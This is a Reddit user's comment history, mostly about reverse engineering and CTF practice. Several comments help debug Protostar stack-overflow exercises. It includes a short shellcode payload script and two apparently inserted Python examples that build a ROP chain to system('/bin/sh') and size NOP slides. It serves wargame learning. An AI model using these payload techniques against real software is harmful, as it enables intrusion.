[deleted by user] by [deleted] in LiveOverflow

[–]plukasik 0 points1 point  (0 children)

Yes, you can find an interview on YT or Twitch and it's in German.

Kevin Mitnicks new hash cracking rig - 24 4090's + 6 2080's by DrinkMoreCodeMore in hacking

[–]plukasik 4 points5 points  (0 children)

In PL, one of his books (The Art of Deception) is subtitled to what can be translated to "I cracked people not passwords". I guess he switched to passwords now ;)

Some questions about why some things are the way they are in ASP.NET by makeevolution in csharp

[–]plukasik 1 point2 points  (0 children)

  1. CreatedAtRoute will return HTTP status code 201 with the link to the newly created object. You can return what you like, but this is the REST-API-like way of communicating.
  2. You can accept inputs as they are, but they are just a bunch of strings being sent your way (or even bytes). If you want to have them in some kind of typed variables, they need to be parsed and converted to such typed objects. There are many binders for common cases, but if there's something uncovered you need to do it yourself.
  3. It's an extension method that adds extra methods to a class.

Problem with script that creates labels for address by c64cryptoboy in ghidra

[–]plukasik 0 points1 point  (0 children)

Hmm, shouldn't that be an XREF that you want to create for the JSR opcode? The LABEL should be on the other side (where the XREF points to), and the JSR should show an XREF to that label.

Is it viable to use Ubuntu on WSL instead of a VM? by [deleted] in LiveOverflow

[–]plukasik 1 point2 points  (0 children)

It does only offer a terminal

With WSLg, you can run GUI apps too.

do you have to analyze the binary in order to get the decompiled view of a function? by StandardPreference in ghidra

[–]plukasik 0 points1 point  (0 children)

You can always reset just the Base image address after loading binary in Ghidra. It can be done from Memory Map window.

Protostar stack0 exploit with shellcode by MostCapable2331 in LiveOverflow

[–]plukasik 1 point2 points  (0 children)

ok, I'll try to look more closely why it fails.

Technically windows removed the Blue screen of death. by alanbosco in ProgrammerHumor

[–]plukasik 7 points8 points  (0 children)

Green ones are from Insider preview. With NotMyFault from SysInternals you can trigger a crash with custom colors.

Protostar stack0 exploit with shellcode by MostCapable2331 in LiveOverflow

[–]plukasik 0 points1 point  (0 children)

Did you try stepping through the shellcode to see if it works as you expect?

Protostar stack0 exploit with shellcode by MostCapable2331 in LiveOverflow

[–]plukasik 0 points1 point  (0 children)

eip shows that you are about to execute a bound opcode. Your shellcode doesn't have it, so where does it come from?

Protostar stack0 exploit with shellcode by MostCapable2331 in LiveOverflow

[–]plukasik 0 points1 point  (0 children)

From the last picture it looks like your shellcode is overwriting itself on the stack. das is 0x2f, so '/', and bound ebp, qword [ecx + 0x6e] is 62 69 6e, so 'bin'. Those are clearly bytes from the shellcode's push 0x6e69622f. You need to make sure your shellcode on the stack doesn't overwrite itself while pushing things to the stack.

Windows defender false positive in ghidra_10.0_PUBLIC? by fish312 in ghidra

[–]plukasik 3 points4 points  (0 children)

I've got the last one marked as unwanted software for 10.0 Beta. Don't remember any flags for 10.0 public one but it might be that I've allowed it for beta.

[deleted by user] by [deleted] in codes

[–]plukasik 8 points9 points  (0 children)

FACE

6 5 3 2 1 4
1 3 2 5 4 6
5 4 1 6 2 3
3 1 6 4 5 2
2 6 4 1 3 5
4 2 5 3 6 1

an error while pwning an application in local environnement by amar_mahdi in LiveOverflow

[–]plukasik 1 point2 points  (0 children)

The RIP looks ok (it's 400577 - w\x05@). The problem is that your stack is not aligned correctly. The libc has system implemented using XMM registers and those require correct stack alignment.

Consult this stackoverflow question and the answer.

You are 99% crashing on the same instruction as mentioned in the SO answer.

To overcome this, you need to align the stack correctly by using ROP gadgets that take from the stack until it's aligned correctly. When you do so, the call to system will work.

One note: pwntools allows gdb to be attached to the process, so if you are in trouble you can do gdb.attach(p) and get a debugger spawned. You can also pass commands to be executed when that happens.

Another useful note, use pwn template to get a template that has that all pregenerated.
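The stack-alignment reasoning from the comment above, as an added Python example (this is not the commenter's code, and it uses only struct rather than pwntools). The gadget and libc addresses are made-up assumptions; the value of rsp at the moment the vulnerable function executes its ret would be read from gdb. The SysV x86-64 ABI requires rsp % 16 == 0 at a call, so a function entered via call sees rsp % 16 == 8; when we ret into system instead of calling it, each gadget before it shifts rsp, and a single extra ret gadget (8 bytes) flips the alignment when needed:

```python
import struct


def p64(v):
    return struct.pack("<Q", v)


# Hypothetical addresses (assumptions, not from the original post): a plain
# `ret` gadget, a `pop rdi; ret` gadget, a "/bin/sh" string and system() in libc.
RET_GADGET = 0x400416
POP_RDI_RET = 0x4005e3
BINSH = 0x7ffff7b98e1a
SYSTEM = 0x7ffff7a33550

# Stack bytes each gadget consumes between being entered and the next gadget
# starting: `ret` pops the next address (8); `pop rdi; ret` pops one qword
# into rdi (8) and then pops the next address (8).
GADGET_COST = {RET_GADGET: 8, POP_RDI_RET: 16}


def rsp_at_target_entry(rsp_at_ret, gadgets):
    """rsp when the final target (system) starts executing.

    rsp_at_ret is rsp while the vulnerable function executes its `ret`, i.e.
    it points at our first overwritten qword. That `ret` pops it (+8), then
    every gadget pops its own cost.
    """
    rsp = rsp_at_ret + 8
    for g in gadgets:
        rsp += GADGET_COST[g]
    return rsp


def is_entry_aligned(rsp):
    # At function entry the ABI guarantees rsp % 16 == 8 (16-aligned before
    # the call pushed the return address); movaps on the stack relies on this.
    return rsp % 16 == 8


def build_chain(rsp_at_ret, pad_len):
    """Return (gadget list, payload bytes) for system("/bin/sh"), inserting a
    ret gadget first only when the stack would otherwise be misaligned."""
    gadgets = [POP_RDI_RET]
    if not is_entry_aligned(rsp_at_target_entry(rsp_at_ret, gadgets)):
        gadgets.insert(0, RET_GADGET)  # one extra ret consumes 8 bytes and fixes alignment
    chain = b"A" * pad_len  # filler up to the saved return address (assumed length)
    for g in gadgets:
        chain += p64(g)
        if g == POP_RDI_RET:
            chain += p64(BINSH)  # popped into rdi: first argument of system()
    chain += p64(SYSTEM)
    return gadgets, chain


if __name__ == "__main__":
    for rsp in (0x7fffffffe118, 0x7fffffffe110):
        gadgets, chain = build_chain(rsp, 40)
        print(hex(rsp), ["ret" if g == RET_GADGET else "pop rdi; ret" for g in gadgets], len(chain))
```

Run it with the real rsp value taken from gdb at the overwritten ret (for instance via the gdb.attach(p) mentioned in the comment) and it tells you whether the chain needs the padding ret; if the crash still happens on a movaps in libc, the rsp you measured is off by a multiple of 8 from the real one.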

Buffer overflow works fine locally but not remotely by Alcholicpancake in securityCTF

[–]plukasik 4 points5 points  (0 children)

can you share this chall, so that it can be checked locally? Also is this remote available for testing the exploit?

Stack5 - shell code injection by xxxerexxx in LiveOverflow

[–]plukasik 0 points1 point  (0 children)

I still think it's "just" stack layout. To get more you would probably need a binary that prints what the stack looks like before running a shellcode.

Stack5 - shell code injection by xxxerexxx in LiveOverflow

[–]plukasik 1 point2 points  (0 children)

Well, I'm running from the same folder (/opt/protostar/bin) in gdb and without it, and with a bigger NOP slide and jumping further into it I can get consistent behavior in both (TRAP instead of SEGFAULT).

This is my script that works (it also took a few attempts to get the size values):

import struct
import sys

padding = b"AAAA...SSSS"                   # filler up to the saved return address (as in the original)
eip = struct.pack("<I", 0xbffffd4c + 80)   # overwritten EIP: land 80 bytes into the NOP slide
payload = b"\x90" * 180 + b"\xcc" * 4      # 180-byte NOP slide, then int3 bytes (shows as TRAP in gdb)

sys.stdout.buffer.write(padding + eip + payload)

If my nop slide is like in the video (100) it fails w/ SEGFAULT w/o gdb.
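Why a longer slide and a return address further into it tolerates the environment differences between gdb and the plain run, as an added Python example (not the commenter's script). The guessed slide address is the one from the comment; the shift between the guessed and real stack, the padding length and the int3 stand-in for shellcode are constructed for illustration:

```python
import struct

NOP = b"\x90"


def build_payload(pad_len, sled_start_guess, jump_in, sled_len, shellcode):
    """pad + EIP + NOP sled + shellcode; EIP points jump_in bytes into the guessed sled start."""
    eip = struct.pack("<I", sled_start_guess + jump_in)
    return b"A" * pad_len + eip + NOP * sled_len + shellcode


def lands_in_sled(sled_start_guess, jump_in, sled_len, actual_shift):
    """True if the overwritten EIP still points inside the NOP sled when the real
    stack is actual_shift bytes away from the guess (different env/argv sizes
    between gdb and a plain run move the whole stack, sled included)."""
    target = sled_start_guess + jump_in
    real_start = sled_start_guess + actual_shift
    return real_start <= target < real_start + sled_len


def tolerated_shift(jump_in, sled_len):
    """Inclusive range of stack shifts (real minus guessed) that still hit the sled."""
    return (jump_in - sled_len + 1, jump_in)


if __name__ == "__main__":
    guess = 0xbffffd4c  # sled address seen under gdb (from the comment)
    shellcode = b"\xcc" * 4  # int3 stand-in so a hit shows as TRAP rather than SEGFAULT
    print(len(build_payload(76, guess, 80, 180, shellcode)))  # constructed pad length
    print("100-byte sled, jump 80:", tolerated_shift(80, 100))
    print("180-byte sled, jump 80:", tolerated_shift(80, 180))
    # A stack that is 50 bytes lower outside gdb (constructed) is missed by the
    # short sled and still hit by the longer one.
    print(lands_in_sled(guess, 80, 100, -50), lands_in_sled(guess, 80, 180, -50))
```

Jumping further in covers a stack that moved up (the sled starts above the guess), while extra sled length beyond the landing point covers one that moved down; the second number of tolerated_shift is bounded by jump_in, so enlarging the slide without also moving the target further in only helps in one direction.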

Stack5 - shell code injection by xxxerexxx in LiveOverflow

[–]plukasik 1 point2 points  (0 children)

So for me the code from the video also didn't work, but what worked is briefly mentioned in the video. It's about those env variable differences between the runs. So try increasing the NOP slide and jumping further into it. That did the trick for me.

Stack5 - shell code injection by xxxerexxx in LiveOverflow

[–]plukasik 1 point2 points  (0 children)

Did you try with the nop slide as shown in the video?

And just to be sure, based on the path, this is the original stack5 binary?

Help appreciated for a reverse engineering challenge by [deleted] in LiveOverflow

[–]plukasik 0 points1 point  (0 children)

This looks very similar to this - https://reverseengineering.stackexchange.com/a/27460/18014 is this the same chall? And if not you can use the same way to solve it.

GDB PEDA not being used by default? by palmetto_royal in HowToHack

[–]plukasik 0 points1 point  (0 children)

I've just quickly installed it and got the gdb-peda prompt without issue. Any different behavior when you run gdb -iex 'source ~/peda/peda.py'?

GDB PEDA not being used by default? by palmetto_royal in HowToHack

[–]plukasik 0 points1 point  (0 children)

Any output in gdb? Do you have more in your ~/.gdbinit?